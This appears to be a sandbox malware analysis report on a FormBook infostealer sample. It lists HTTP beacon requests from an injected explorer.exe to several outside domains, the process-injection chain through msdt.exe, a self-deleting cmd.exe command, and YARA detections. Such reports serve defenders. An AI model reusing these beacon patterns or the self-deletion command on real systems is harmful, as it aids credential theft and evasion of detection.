                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Location: https://www.dunedinhyperlocal.com/u4an/?1bxhyLu=QzQ5ef7X9Qx2RFxJxLuAV3Nyo+3E4vM7eDKYIH9lLMMMsSlhTFVhOgGCly15LXQ6PZbXEA==&a8a=O6e4vnipWHrd6Lz
                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.2249167216.172.172.20880C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:07.491132975 CEST3OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== HTTP/1.1
                                                                  Host: www.oinfoproduto.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:08.474100113 CEST3INHTTP/1.1 301 Moved Permanently
                                                                  Date: Mon, 27 Sep 2021 15:32:07 GMT
                                                                  Server: Apache
                                                                  X-UA-Compatible: IE=edge
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Upgrade: h2,h2c
                                                                  Connection: Upgrade, close
                                                                  Location: http://oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==
                                                                  Content-Length: 0
                                                                  Content-Type: text/html; charset=UTF-8


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.2249168162.0.229.24180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:18.785186052 CEST4OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== HTTP/1.1
                                                                  Host: www.multicoininvestment.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:18.948822021 CEST6INHTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:18 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  4192.168.2.2249169162.0.232.16280C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:24.141268015 CEST6OUTGET /u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz HTTP/1.1
                                                                  Host: www.theseattlenotary.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:24.307697058 CEST8INHTTP/1.1 301 Moved Permanently
                                                                  keep-alive: timeout=5, max=100
                                                                  content-type: text/html
                                                                  content-length: 707
                                                                  date: Mon, 27 Sep 2021 15:32:24 GMT
                                                                  server: LiteSpeed
                                                                  location: https://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz
                                                                  x-turbo-charged-by: LiteSpeed
                                                                  connection: close
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  5192.168.2.2249170216.239.32.2180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:29.450268984 CEST8OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== HTTP/1.1
                                                                  Host: www.petersonmovingco.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:29.531821966 CEST10INHTTP/1.1 200 OK
                                                                  Content-Type: text/html; charset=utf-8
                                                                  x-ua-compatible: IE=edge
                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                  Pragma: no-cache
                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                  Date: Mon, 27 Sep 2021 15:32:29 GMT
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Cross-Origin-Opener-Policy: unsafe-none
                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Q2VDqHH8JEhHLrd9BvMcDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Server: ESF
                                                                  X-XSS-Protection: 0
                                                                  X-Content-Type-Options: nosniff
                                                                  Set-Cookie: NID=511=Wbsymr0SWWRHD-rgYevkhlyxEht6VWs54689I0H8buzMRXggbGvzdbaW38cH3R9CI0-WqXrcOYZhJqr4bhoRK_izgLLSbsYN41B7yTQNTDIkOaKP9zhPiH4b7pQo9_Dxe6RieNOgYlXHOAGFDnfGUZNbKpODKC8TiUvlRaTWHjc; expires=Tue, 29-Mar-2022 15:32:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                  Accept-Ranges: none
                                                                  Vary: Accept-Encoding
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 51 32 56 44 71 48 48 38 4a 45 68 48 4c 72 64 39 42 76 4d 63 44 77 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67
                                                                  Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/Locuseriness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="Q2VDqHH8JEhHLrd9BvMcDw">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.goog


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.2249171162.251.85.17480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 27, 2021 17:32:39.962572098 CEST52OUTGET /u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== HTTP/1.1
                                                                  Host: www.quinnwebster.top
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Sep 27, 2021 17:32:40.120680094 CEST53INHTTP/1.1 404 Not Found
                                                                  Date: Mon, 27 Sep 2021 15:32:40 GMT
                                                                  Server: nginx/1.19.5
                                                                  Content-Type: text/html
                                                                  Content-Length: 583
                                                                  Last-Modified: Sat, 24 Jul 2021 10:05:02 GMT
                                                                  Accept-Ranges: bytes
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                  Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: ejecutable1.exe PID: 788 Parent PID: 1528

                                                                  General

                                                                  Start time:17:31:14
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: ejecutable1.exe PID: 2656 Parent PID: 788

                                                                  General

                                                                  Start time:17:31:18
                                                                  Start date:27/09/2021
                                                                  Path:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\ejecutable1.exe
                                                                  Imagebase:0xf50000
                                                                  File size:840192 bytes
                                                                  MD5 hash:FF2724DDF0EF0525E9E419DB5199E96F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: explorer.exe PID: 1764 Parent PID: 2656

                                                                  General

                                                                  Start time:17:31:19
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                  Imagebase:0xffa10000
                                                                  File size:3229696 bytes
                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Analysis Process: msdt.exe PID: 2632 Parent PID: 1764

                                                                  General

                                                                  Start time:17:31:32
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                  Imagebase:0xbe0000
                                                                  File size:983040 bytes
                                                                  MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:moderate

                                                                  Analysis Process: cmd.exe PID: 1172 Parent PID: 2632

                                                                  General

                                                                  Start time:17:31:36
                                                                  Start date:27/09/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\ejecutable1.exe'
                                                                  Imagebase:0x4a890000
                                                                  File size:302592 bytes
                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >